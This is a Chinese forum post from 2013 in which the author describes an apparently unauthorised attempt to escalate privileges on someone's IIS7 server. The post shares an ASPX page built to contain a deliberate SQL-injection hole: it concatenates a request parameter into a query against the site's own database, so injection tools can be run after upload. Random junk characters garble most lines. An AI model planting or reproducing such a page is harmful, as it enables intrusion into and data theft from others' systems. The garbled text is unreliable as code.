昨天跟4z1看一个站点,提权很难提,看了整整5个小时,无果。 2008+iis7,无sa,无root,无各种服务。。。! R& \- {' W% Q- e7 v% O
其实中用到了aspx构造注射来跨站,网上找了一堆代码,没一个能用的。
) P7 @, ? \6 T4 `% D( Q代码量不多,自己写个拉倒了。烦死了。* s6 i+ e2 Y+ N" j# \8 j$ m' r$ r
1 U) U1 |* J4 G# c) w7 p A6 A. J
6 O5 w" W$ W+ ^! x
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
) X4 z* z! B# B7 T<html xmlns="http://www.w3.org/1999/xhtml">! m+ {4 ^7 C _8 t
<head runat="server">! Z3 T9 R. M% s/ O3 a) ?- }) n
<title>暗影aspx构造注射专用页面</title>
5 o3 f7 E4 J5 e: l</head>) A4 |' V+ S; {5 P3 `. V h% a
<body>
5 L$ G; E: R7 r9 W4 `# @ <form id="form1" runat="server">+ u/ ~! Z( ]$ W7 ?# v4 i
<div>
; c, [0 k/ [# H7 q7 D; _! q2 H <script language="c#" runat="server">& s$ Q+ P2 B' Z
' q& c1 v0 P/ E, T' E% I% y void page_init(object sender, EventArgs e)
4 I* E' b, H) v2 \+ ~$ O) M2 Z {
$ H+ K7 t$ T1 j& \) q0 ` # }5 ?" S- ]5 e' v
System.Data.SqlClient.SqlConnection conn = new System.Data.SqlClient.SqlConnection();
/ s% |- o& `# z1 x8 X
5 e4 @1 `7 M1 S/ R. a/ G2 P% ^ conn.ConnectionString = ConfigurationManager.ConnectionStrings["连接名"].ToString();
% `# G7 O* R+ y+ t4 |+ d conn.Open();
# P. d; |( @1 S" v4 V1 P + X9 T' c5 Q0 \% p3 n
string i = this.Page.Request.Params["xxser"]; //这里是参数?xxser=1& ^; R s' |( s3 H
" b0 ?- }: `% B. |# } System.Data.SqlClient.SqlCommand command = new System.Data.SqlClient.SqlCommand("select * from [表] where 列名= " + i, conn);
6 W- C: ]& i) J int x = command.ExecuteNonQuery();" b8 W4 ~- ^. y* x" o& o6 f
Response.Write(i+"\n");! {4 C1 b" ^! j. K' R/ W
Response.Write(x);/ u* n, q; u- h; q" [! ]
conn.Close();
- m3 Y( M! k0 F) `0 I. A; Z9 Z }8 }6 C$ J* ^/ b* g `8 g- U/ n' ?
4 \( `3 y/ s* }5 S6 a% u </script>
/ A& P" J5 H1 x, F </div>0 Z$ c! i# B3 s& ?8 L/ n
</form>6 Y; h9 p# r8 }3 w4 W) E6 S
</body>) |# ^/ j* V& b2 Q6 ]( Z/ J7 T9 o
</html>
- r- g5 X c' a4 i |
发表于 2013-3-20 21:32:01
收藏
支持
反对